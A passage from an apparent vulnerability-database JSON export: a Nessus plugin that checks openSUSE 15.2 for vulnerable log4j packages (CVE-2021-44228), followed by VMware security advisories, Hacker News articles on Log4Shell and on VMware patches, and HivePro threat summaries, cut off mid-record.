The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156146);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/17\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0052\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"openSUSE 15 Security Update : log4j (openSUSE-SU-2021:1577-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the\nopenSUSE-SU-2021:1577-1 advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log\n messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from\n LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been\n disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this\n vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging\n Services projects. 
(CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1193611\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/OHVQSNSG4OZ336XWLNWGUL3TQE2ZZODK/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?53a91573\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-44228\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected log4j, log4j-javadoc, log4j-jcl and / or log4j-slf4j packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:log4j-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j-jcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j-slf4j\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.2', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\nvar pkgs = [\n {'reference':'log4j-2.13.0-lp152.3.3.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-javadoc-2.13.0-lp152.3.3.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-jcl-2.13.0-lp152.3.3.1', 'release':'SUSE15.2', 
'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-slf4j-2.13.0-lp152.3.3.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'log4j / log4j-javadoc / log4j-jcl / log4j-slf4j');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "vmware": [{"lastseen": "2023-12-03T16:01:22", "description": "3a. Use-after-free vulnerability in XHCI USB controller (CVE-2021-22040) \n\nVMware ESXi, Workstation, and Fusion contain a use-after-free vulnerability in the XHCI USB controller.VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.4. \n\n3b. Double-fetch vulnerability in UHCI USB controller (CVE-2021-22041) \n\nVMware ESXi, Workstation, and Fusion contain a double-fetch vulnerability in the UHCI USB controller. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.4. \n\n3c. 
ESXi settingsd unauthorized access vulnerability (CVE-2021-22042) \n\nVMware ESXi contains an unauthorized access vulnerability due to VMX having access to settingsd authorization tickets. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.2. \n\n3d. ESXi settingsd TOCTOU vulnerability (CVE-2021-22043) \n\nVMware ESXi contains a TOCTOU (Time-of-check Time-of-use) vulnerability that exists in the way temporary files are handled. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.2. \n\n3e. ESXi slow HTTP POST denial of service vulnerability (CVE-2021-22050) \n\nESXi contains a slow HTTP POST denial-of-service vulnerability in rhttpproxy. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-15T00:00:00", "type": "vmware", "title": "VMware ESXi, Workstation, and Fusion updates address multiple security vulnerabilities (CVE-2021-22040, CVE-2021-22041, CVE-2021-22042, CVE-2021-22043, CVE-2021-22050)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22040", "CVE-2021-22041", "CVE-2021-22042", "CVE-2021-22043", "CVE-2021-22050"], "modified": "2022-02-15T00:00:00", "id": "VMSA-2022-0004", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0004.html", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:37:33", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgyKfc9__syaqldjnfRLkbKcjq_aRPiyYzPVxRRgvqf6mHz5C-K5EVCbYZfHzH8Pgsg5AMT4EIZKDLjRLmSb1WevPfBxvC38w22PcPnvPor5LWJLTxMC8WzseBJm3IJIHUtOZRLjFH_bKLqQj8XIPAfXq8afPepck3DaT086jfx2ASbXCD9XMDejboM>)\n\nVMware on Tuesday patched several [high-severity](<https://www.vmware.com/security/advisories/VMSA-2022-0004.html>) [vulnerabilities](<https://www.vmware.com/security/advisories/VMSA-2022-0005.html>) impacting ESXi, Workstation, Fusion, Cloud Foundation, and NSX Data Center for vSphere that could be exploited to execute arbitrary code and cause a denial-of-service (DoS) condition.\n\nAs of writing, there's no evidence that any of the weaknesses are exploited in the wild. 
The list of six flaws is as follows \u2013\n\n * **CVE-2021-22040** (CVSS score: 8.4) - Use-after-free vulnerability in XHCI USB controller\n * **CVE-2021-22041** (CVSS score: 8.4) - Double-fetch vulnerability in UHCI USB controller\n * **CVE-2021-22042** (CVSS score: 8.2) - ESXi settingsd unauthorized access vulnerability\n * **CVE-2021-22043** (CVSS score: 8.2) - ESXi settingsd TOCTOU vulnerability\n * **CVE-2021-22050** (CVSS score: 5.3) - ESXi slow HTTP POST denial-of-service vulnerability\n * **CVE-2022-22945** (CVSS score: 8.8) - CLI shell injection vulnerability in the NSX Edge appliance component\n\nSuccessful exploitation of the flaws could allow a malicious actor with local administrative privileges on a virtual machine to execute code as the virtual machine's VMX process running on the host. It could also allow the adversary with access to settingsd to escalate their privileges by writing arbitrary files.\n\nAdditionally, CVE-2021-22050 could be weaponized by an adversary with network access to ESXi to create a DoS condition by overwhelming rhttpproxy service with multiple requests. Last but not least, CVE-2022-22945 could permit an attacker with SSH access to an NSX-Edge appliance (NSX-V) to run arbitrary commands on the operating system as root user.\n\nFour of the issues were originally discovered as part of the [Tianfu Cup](<https://thehackernews.com/2021/10/windows-10-linux-ios-chrome-and-many.html>) held last year in China, with the virtualization services provider working with the contest's organizers to review the findings and receive the information privately.\n\n\"The ramifications of this vulnerability are serious, especially if attackers have access to workloads inside your environments,\" VMware [noted](<https://core.vmware.com/vmsa-2022-0004-questions-answers-faq>) in a separate FAQ. 
\"Organizations that practice change management using the [ITIL definitions](<https://wiki.en.it-processmaps.com/index.php/Change_Management>) of change types would consider this an 'emergency change.'\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T11:25:00", "type": "thn", "title": "VMware Issues Security Patches for High-Severity Flaws Affecting Multiple Products", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22040", "CVE-2021-22041", "CVE-2021-22042", "CVE-2021-22043", "CVE-2021-22050", "CVE-2022-22945"], "modified": "2022-02-18T03:18:38", "id": "THN:A6706F6A6D380D968EF32C856D9C796F", "href": "https://thehackernews.com/2022/02/vmware-issues-security-patches-for-high.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:45", "description": 
"[](<https://thehackernews.com/new-images/img/a/AVvXsEg6YZzGXTUELW4pVOf4TR_Z-Qu-x0FLnC6O4tsA48fIowXPd6l-VHroZpdt_FLum2bVjowvoyLiZQ30kmeZezCpr5zpmeEm-Rantvt6rCc2h6H2LoHPLmnj1ke77tMwetH9Riv19RhTKszdj6420Dk7SQ0_31L-lUrp4s9whx7HjgJgrT-vgNYmBMP5>)\n\nA never-before-seen China-based targeted intrusion adversary dubbed **Aquatic Panda **has been observed leveraging [critical flaws](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>) in the Apache Log4j logging library as an access vector to perform various post-exploitation operations, including reconnaissance and credential harvesting on targeted systems.\n\nCybersecurity firm CrowdStrike said the infiltration, which was ultimately foiled, was aimed at an unnamed \"large academic institution.\" The state-sponsored group is believed to have been operating since mid-2020 in pursuit of intelligence collection and industrial espionage, with its attacks primarily directed against companies in the telecommunications, technology, and government sectors.\n\nThe attempted intrusion exploited the newly discovered [Log4Shell](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) flaw (CVE-2021-44228, CVSS score: 10.0) to gain access to a vulnerable instance of the [VMware Horizon](<https://kb.vmware.com/s/article/87073>) desktop and app virtualization product, followed by running a series of malicious commands orchestrated to fetch threat actor payloads hosted on a remote server.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgqBlahJbsTfoccuO0N2zuhjjsJP3u8aIaRLaVSRXFnw-s5991WD8rNH0pslvdX_M4U5o1Am83333vRx3MvPKf_LSw64qAultRxSib6Ebm8qT9Q3x6RiZTIxNw1_hAzRYIrmyUVFtvTzWqxzzalobjd8WqD1HnBX4oqEVVggd_9aknnqQfB3vb0RE0y>)\n\n\"A modified version of the Log4j exploit was likely used during the course of the threat actor's operations,\" the researchers [noted](<https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/>), adding it 
involved the use of an exploit that was published in GitHub on December 13, 2021.\n\nAquatic Panda's malicious behavior went beyond conducting reconnaissance of the compromised host, starting with making an effort to stop a third-party endpoint detection and response (EDR) service, before proceeding to retrieve next-stage payloads designed to obtain a reverse shell and harvest credentials.\n\nBut after the victim organization was alerted to the incident, the entity \"was able to quickly implement their incident response protocol, eventually patching the vulnerable application and preventing further threat actor activity on the host.\" In light of the attack's successful disruption, the exact intent remains unknown.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-30T10:07:00", "type": "thn", "title": "Chinese APT Hackers Used Log4Shell Exploit to Target Academic Institution", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-30T10:07:36", "id": "THN:7958F9B1AA180122992C6A0FADB03536", "href": "https://thehackernews.com/2021/12/chinese-apt-hackers-used-log4shell.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:49", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgul5prT8igF6QOpUFSIDyQRmLuxGJ2c92UiBBFSTwQokAb-z9IAS8NOTkurRSsXUlWiO594AQKF5F5poW2VwixXqlS-0kR52JN7RdZ_sGdKfylB_GKWjo5-Hz-cVwcHEOlqUsE9doPNzxVSfhN-5l5odfF0Azpw2a7CZI3P1m684txHPPtg3ffHRZI>)\n\nThe Apache Software Foundation has released fixes to contain an [actively](<https://twitter.com/DTCERT/status/1469258597930614787>) [exploited](<https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/>) zero-day vulnerability affecting the widely-used Apache Log4j Java-based logging library that could be weaponized to execute malicious code and allow a complete takeover of vulnerable systems.\n\nTracked as [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) and by the monikers Log4Shell or LogJam, the issue concerns a case of unauthenticated, remote code execution (RCE) on any application that uses the open-source utility and affects versions Log4j 2.0-beta9 up to 2.14.1. The bug has scored a perfect 10 on 10 in the CVSS rating system, indicative of the severity of the issue.\n\n\"An attacker who can control log messages or log message parameters can execute arbitrary code loaded from [LDAP](<https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol>) servers when message lookup substitution is enabled,\" the Apache Foundation [said](<https://logging.apache.org/log4j/2.x/security.html>) in an advisory. 
\"From Log4j 2.15.0, this behavior has been disabled by default.\"\n\nExploitation can be achieved by a single string of text, which can trigger an application to reach out to a malicious external host if it is logged via the vulnerable instance of Log4j, effectively granting the adversary the ability to retrieve a payload from a remote server and execute it locally. The project maintainers credited Chen Zhaojun of Alibaba Cloud Security Team with discovering the issue.\n\nLog4j is used as a logging package in a variety of different [popular software](<https://github.com/YfryTchsGD/Log4jAttackSurface>) by a [number of manufacturers](<https://www.lunasec.io/docs/blog/log4j-zero-day/>), including Amazon, Apple iCloud, [Cisco](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd>), [Cloudflare](<https://blog.cloudflare.com/how-cloudflare-security-responded-to-log4j2-vulnerability/>), ElasticSearch, [Red Hat](<https://access.redhat.com/security/vulnerabilities/RHSB-2021-009>), Steam, Tesla, Twitter, and video games such as [Minecraft](<https://twitter.com/Minecraft/status/1469303202864582658>). In the case of the latter, attackers have been able to [gain RCE on Minecraft Servers](<https://twitter.com/MalwareTechBlog/status/1469290238702874625>) by simply pasting a specially crafted message into the chat box.\n\n## A huge attack surface\n\n\"The Apache Log4j zero-day vulnerability is probably the most critical vulnerability we have seen this year,\" said Bharat Jogi, senior manager of vulnerabilities and signatures at Qualys. \"Log4j is a ubiquitous library used by millions of Java applications for logging error messages. 
This vulnerability is trivial to exploit.\"\n\nCybersecurity firms [BitDefender](<https://www.bitdefender.com/blog/labs/bitdefender-honeypots-signal-active-log4shell-0-day-attacks-underway-patch-immediately/>), [Cisco Talos](<https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html>), [Huntress Labs](<https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>), and [Sonatype](<https://blog.sonatype.com/a-new-0-day-log4j-vulnerability-discovered-in-the-wild>) have all confirmed evidence of [mass scanning](<https://twitter.com/bad_packets/status/1469225135504650240>) of affected applications in the wild for vulnerable servers and attacks registered against their honeypot networks following the [availability](<https://github.com/tangxiaofeng7/apache-log4j-poc>) of a proof-of-concept ([PoC](<https://twitter.com/artsploit/status/1469245422153699329>)) exploit. \"This is a low skilled attack that is extremely simple to execute,\" Sonatype's Ilkka Turunen said.\n\nGreyNoise, likening the flaw to [Shellshock](<https://en.wikipedia.org/wiki/Shellshock_\\(software_bug\\)>), said it [observed malicious activity](<https://www.greynoise.io/blog/apache-log4j-vulnerability-CVE-2021-44228>) targeting the vulnerability commencing on December 9, 2021. Web infrastructure company Cloudflare [noted](<https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/>) that it blocked roughly 20,000 exploit requests per minute around 6:00 p.m. 
UTC on Friday, with most of the exploitation attempts originating from Canada, the U.S., Netherlands, France, and the U.K.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEiF0T2Z3ZhJuJvi4iXOVnMObpEIIkpeySrUTULgZGMDn-kF_woeWWzSyQdA4pbTO1NCpBIs07LACczt-w0XPrARbsx4PB2TOP3hm61TAj5wTY4ZpoqevnUrhmCiRs394f2SDSExwyCzjhugrmJ43kWXM9jTclkZ_-sSBs4WylRTHXSpkPnp0T5UxN_e>)\n\nGiven the ease of exploitation and prevalence of Log4j in enterprise IT and DevOps, [in-the-wild attacks](<https://www.greynoise.io/viz/query/?gnql=tags%3A%22Apache%20Log4j%20RCE%20Attempt%22>) aimed at susceptible servers are expected to ramp up in the coming days, making it imperative to address the flaw immediately. Israeli cybersecurity firm Cybereason has also released a fix called \"[Logout4Shell](<https://github.com/Cybereason/Logout4Shell>)\" that closes out the shortcoming by using the vulnerability itself to reconfigure the logger and prevent further exploitation of the attack.\n\n\"This Log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string,\" Security expert Marcus Hutchins [said](<https://twitter.com/MalwareTechBlog/status/1469289471463944198>) in a tweet.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T04:18:00", "type": "thn", "title": "Extremely Critical Log4J Vulnerability Leaves Much of the Internet at Risk", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-11T05:29:48", "id": "THN:AFF2BD38CB9578D0F4CA96A145933627", "href": "https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2022-02-25T21:37:59", "description": "THREAT LEVEL: Amber. For a detailed advisory, download the pdf file here VMware addressed vulnerabilities in ESXi, Workstation, Fusion, and Cloud Foundation, few months after the discovery of these bugs by participants at Tianfu Cup Pwn Contest. 
VMware has rated some of these vulnerabilities as important; however, chaining these issues together may result in what is effectively a critical exploit. Successfully exploiting VMware Workstation might allow attackers to perform a guest-to-host escape, and when combined with ESXi exploitation, it may allow them to execute code as the virtual machine's VMX process and obtain root permissions on the host machine. A use-after-free vulnerability in the XHCI USB controller (CVE-2021-22040) and a double-fetch vulnerability in the UHCI USB controller (CVE-2021-22041) were reported. Attackers with local administrative privileges on a virtual machine may exploit these issues to execute code as the virtual machine's VMX process running on the host if an isochronous USB endpoint is available. Another noted vulnerability was the ESXi settingsd unauthorized access vulnerability (CVE-2021-22042), which allows an attacker with privileges within the VMX process only to access the settingsd service running as a highly privileged user. In addition to these bugs, an ESXi settingsd TOCTOU vulnerability (CVE-2021-22043) also allows an attacker with access to settingsd to escalate their privileges by writing arbitrary files. Organizations should apply all the patches as given below. VMware has also included workarounds in their advisories, suggesting to customers that removing USB controllers from virtual machines may help resolve these issues. 
Potential MITRE ATT&CK TTPs are: TA0001: Initial Access TA0040: Impact TA0007: Discovery TA0004: Privilege Escalation TA0005: Defense Evasion T1068: Exploitation for Privilege Escalation T1497: Virtualization/Sandbox Evasion T1195: Supply Chain Compromise T1499: Endpoint Denial of Service T1499.001: Endpoint Denial of Service: Service Exhaustion Flood Vulnerability Details Patch Link https://www.vmware.com/security/advisories/VMSA-2022-0004.html References https://www.securityweek.com/vmware-patches-vulnerabilities-reported-researchers-chinese-government https://www.zdnet.com/article/vmware-patches-released-after-vulnerabilities-found-during-tianfu-cup/", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T13:43:03", "type": "hivepro", "title": "VMware addresses security flaws discovered during Tianfu Cup Pwn Contest", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22040", "CVE-2021-22041", "CVE-2021-22042", "CVE-2021-22043"], "modified": "2022-02-16T13:43:03", "id": "HIVEPRO:28461231008E2CD9C4C856AF402D282D", "href": 
"https://www.hivepro.com/vmware-addresses-security-flaws-discovered-during-tianfu-cup-pwn-contest/", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-11-17T15:39:19", "description": "Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary Iranian APT activity was detected on the networks of federal agencies. The intruders utilized an exploit targeting Log4Shell (CVE-2021-44228) to install XMRig crypto mining software on an unpatched VMware Horizon server. Due to the similarity in the tools used and attack chain hive pro threat research team has linked it to the Iranian state-sponsored actor Fox Kitten", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-17T12:28:57", "type": "hivepro", "title": "Iranian hackers leveraged Log4Shell to penetrate US federal agency", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 